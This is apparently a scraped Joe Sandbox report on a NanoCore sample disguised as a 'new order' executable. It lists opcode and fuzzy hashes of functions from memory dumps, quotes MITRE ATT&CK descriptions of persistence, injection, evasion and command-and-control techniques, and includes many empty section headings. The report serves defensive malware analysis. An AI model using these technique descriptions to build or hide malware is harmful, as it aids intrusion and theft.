Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180189d4c76f02bc41663a48cd1554def5ebe36afb5e60e08555922df9b1016a
Instruction ID: d0c0f45891778e021bedba9b2aadfbf9293d17d09cef582bb70a3f76271df0df
Opcode Fuzzy Hash: 180189d4c76f02bc41663a48cd1554def5ebe36afb5e60e08555922df9b1016a
Instruction Fuzzy Hash: 9C01D6306053829FC7154774941476BBFF6AFC2610F25806A9855CB393CF788C068761

Uniqueness

Uniqueness Score: -1.00%

Function 05861D88, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e20fccbe9e9f8f33f15682d098ce92eeac554286c90d7b55a4ecc55ce08c787
Instruction ID: 783de7ffd192e863b6b91d15b52b48fc3a632ef3042790c886168b3a46ba27af
Opcode Fuzzy Hash: 7e20fccbe9e9f8f33f15682d098ce92eeac554286c90d7b55a4ecc55ce08c787
Instruction Fuzzy Hash: 1FF0C8306053829FC7155775982476ABFFBAFC1610F14806A9855CB397DE789C068761

Uniqueness

Uniqueness Score: -1.00%

Function 058606C8, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16b2c12d31c4c45d4b20f77f05534d09c58b692e20385ab9258ce042db94daf
Instruction ID: 642ebfdc7558d28d241bca02bc096d5d0145c8d1947cf3f8cbf61e983fe7d621
Opcode Fuzzy Hash: b16b2c12d31c4c45d4b20f77f05534d09c58b692e20385ab9258ce042db94daf
Instruction Fuzzy Hash: B0F049367006009FD715AB38A41C76D77E6ABC8622F14806AE90AC73D8EF7048068B42

Uniqueness

Uniqueness Score: -1.00%

Function 058617F3, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 760b4875aa4e701ccc01886f71cdc4587c2b5a48e70acf23d1290e25f25c0ec3
Instruction ID: 04b24bbab7199521c533716e1b982169ede940700a4a172c6ada8c90b0bbc0a0
Opcode Fuzzy Hash: 760b4875aa4e701ccc01886f71cdc4587c2b5a48e70acf23d1290e25f25c0ec3
Instruction Fuzzy Hash: 1AF0CD30B021568BDB08E379C428B6EB3C7EBC5910B240028D506CB3C1FE29EC46C3DA

Uniqueness

Uniqueness Score: -1.00%

Function 05860633, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38107a164e4331536fb03175d8f9ef68a0f2016e95be8d1212eb558581ba5356
Instruction ID: 51efaf9cefe104f9fe0b4711ac2f697e89b19bd0edd0228c8c335cdfd155c20d
Opcode Fuzzy Hash: 38107a164e4331536fb03175d8f9ef68a0f2016e95be8d1212eb558581ba5356
Instruction Fuzzy Hash: 34F0A7367006155BC718AB3AD41C66E7BE7EFC8661B04C03AE90AC73A9DE748C028781

Uniqueness

Uniqueness Score: -1.00%

Function 05860640, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3731e59fcaf6b831d4603cdd0ef7e8977317a4ce5464fd7905df1befd55d07ee
Instruction ID: 880467cb4a396f0c6c40b8ce92c811d27ca3a06578055302fb2407fc283bbc60
Opcode Fuzzy Hash: 3731e59fcaf6b831d4603cdd0ef7e8977317a4ce5464fd7905df1befd55d07ee
Instruction Fuzzy Hash: 59E092367006114F8718AB3EA41C42DB7E7AFCD671319807AEA0BC7399DEB44C078796

Uniqueness

Uniqueness Score: -1.00%

Function 058618E8, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de027395a4af55fd3ea14d990756113074ff793e9b913d762ef8fe51d3bbbc5d
Instruction ID: d7b5394fdcf039a6166bdb9c9596394a9ac1651e77e442bf11dbb2e63837c26b
Opcode Fuzzy Hash: de027395a4af55fd3ea14d990756113074ff793e9b913d762ef8fe51d3bbbc5d
Instruction Fuzzy Hash: 4DF0E5367012049FC718DF38E88888B7B66EFCD221314C03AE906CB314EEB49C05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 018405F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247329139.0000000001840000.00000040.00000040.sdmp, Offset: 01840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d21f1b866286d0abcac8ca852020463874e89f99cf5ca524a31d1c7508e04ed
Instruction ID: d268c3ebb59766c966b3cd1e06759df4f0b0f0af240cca09637cb3513aa1bd54
Opcode Fuzzy Hash: 7d21f1b866286d0abcac8ca852020463874e89f99cf5ca524a31d1c7508e04ed
Instruction Fuzzy Hash: BEE0927A640A008BD650CF0AFC81466F7D8EB84630B18C07FDC0D8B715D275B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 058618F8, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc286af0d3ebcbfca3819734a94a1f418b7eeb7cd6ee2c6c9d48ed953ed82a0
Instruction ID: acb6b97c86c2b41ece37fe01777ed3e53375318f57f9e7b444a528ee1bae7854
Opcode Fuzzy Hash: bdc286af0d3ebcbfca3819734a94a1f418b7eeb7cd6ee2c6c9d48ed953ed82a0
Instruction Fuzzy Hash: 60E012363012049BD718DF39E89889F7B9AEBCD261350C53AE90ACB304DEB19C059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 058619A0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca85292b23d4e80c6c8bf2c360ff3ec89b12d449f4db2e6a3f61e7991e84c593
Instruction ID: 0135e2aa2cecc0a722808d77e28a7a8fa40e94552a8a84baf558b94b3d9ab6a3
Opcode Fuzzy Hash: ca85292b23d4e80c6c8bf2c360ff3ec89b12d449f4db2e6a3f61e7991e84c593
Instruction Fuzzy Hash: 28E0C2313011119BC71862BDE004A5EB3DECBCA320B10407BE509CB361CEB5EC4543A1

Uniqueness

Uniqueness Score: -1.00%

Function 017323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247137171.0000000001732000.00000040.00000001.sdmp, Offset: 01732000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3d344de07f038ef1aba98e9fcb9b9f06b7e6a57e2eac4b1a5b1a3aae218c9c
Instruction ID: 5b36e44e71eb5e1694398930a1e546011593e6aaf3b0d4210104d32076b4865a
Opcode Fuzzy Hash: da3d344de07f038ef1aba98e9fcb9b9f06b7e6a57e2eac4b1a5b1a3aae218c9c
Instruction Fuzzy Hash: B8D05E79305A814FE3268A1CC1A8B957BA4AB91B04F5644F9E8008B663C369E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 05860251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09730b32627e0414a99229f8bff6206bb3880ca9beaa49df2f39090bb8c9c7fb
Instruction ID: 5a3cab7d67657693f6f04b229393dcad4b22d052bbcdd1adf6bcdb94091fe7ab
Opcode Fuzzy Hash: 09730b32627e0414a99229f8bff6206bb3880ca9beaa49df2f39090bb8c9c7fb
Instruction Fuzzy Hash: 62D01236B04004CFEF10D6BDF9081ECB792EFC5229B1000BBD60BDB651D9328C1A8705

Uniqueness

Uniqueness Score: -1.00%

Function 017323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247137171.0000000001732000.00000040.00000001.sdmp, Offset: 01732000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40eaac4c08d7523d017401f4989c640447a93451b406bd9791ce8eec54be8533
Instruction ID: c52b6d037af38fd89bfe7312d1a8a66dd737e90523c14c1046555f703580b62a
Opcode Fuzzy Hash: 40eaac4c08d7523d017401f4989c640447a93451b406bd9791ce8eec54be8533
Instruction Fuzzy Hash: A0D05E352402818BD715DB0CC194F59BBD4AB81B00F0644E8AD008B2B3C3A4D881C600

Uniqueness

Uniqueness Score: -1.00%

Function 05860130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7efdad5fd915d0fb0169b8a792c95c07202dc90b72c2fb4745c9faeccce6795
Instruction ID: 68f172c16c4c8c7f4bd3928e43ef4fbf5d5c4e18792863de67bdb5065342bf2c
Opcode Fuzzy Hash: f7efdad5fd915d0fb0169b8a792c95c07202dc90b72c2fb4745c9faeccce6795
Instruction Fuzzy Hash: 31C02B30344B0847DF102AF4784836A338C6780214F000430BC0ECB140EC69DC004280

Uniqueness

Uniqueness Score: -1.00%

Function 058618BB, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aec51834b114637a1e853c2e9c94a08adb66ec193f7269a8333dbd97a1fb8e4
Instruction ID: f497ff13839d9d7516cb0396b2f8cb2edc6281633495f5b14e8c159ac8dac6fe
Opcode Fuzzy Hash: 9aec51834b114637a1e853c2e9c94a08adb66ec193f7269a8333dbd97a1fb8e4
Instruction Fuzzy Hash: A1D05271008302AFC340DF28D84AB2BBBE0EB88615F00C92CE08986100E370A818AB52

Uniqueness

Uniqueness Score: -1.00%

Function 058618C8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eeb5c2278b21d764518436a14963729b7d13f71c19fd637e569d8d6fba541f1
Instruction ID: 3b3a059ba45d8ab91bb85137f7b65132f4b9812f467453ba9f144b18b021cf66
Opcode Fuzzy Hash: 4eeb5c2278b21d764518436a14963729b7d13f71c19fd637e569d8d6fba541f1
Instruction Fuzzy Hash: A9C01270418301AFC740EF28EC4596A7BF0EA84615F40CA2CE48DC2114F270591CCB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report P0 (2021)-2790 new order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Function 00A31670, Relevance: 361.3, APIs: 6, Strings: 200, Instructions: 763
stringmemorywindowCOMMON

Function 00A33613, Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Function 00A31450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorystringCOMMON

Function 00A310B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60
memoryCOMMON

Function 00A3FDE2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Function 00A34904, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 00A3928D, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00A348D3, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00A3CE5D, Relevance: .3, Instructions: 345
COMMONCrypto

Function 00A3D292, Relevance: .3, Instructions: 341
COMMONCrypto

Function 00A3CA28, Relevance: .3, Instructions: 331
COMMONCrypto

Function 00A3C610, Relevance: .3, Instructions: 323
COMMONCrypto

Function 00A31160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225
memorystringregistryCOMMON

Function 00A3A51E, Relevance: 19.6, APIs: 13, Instructions: 84
COMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre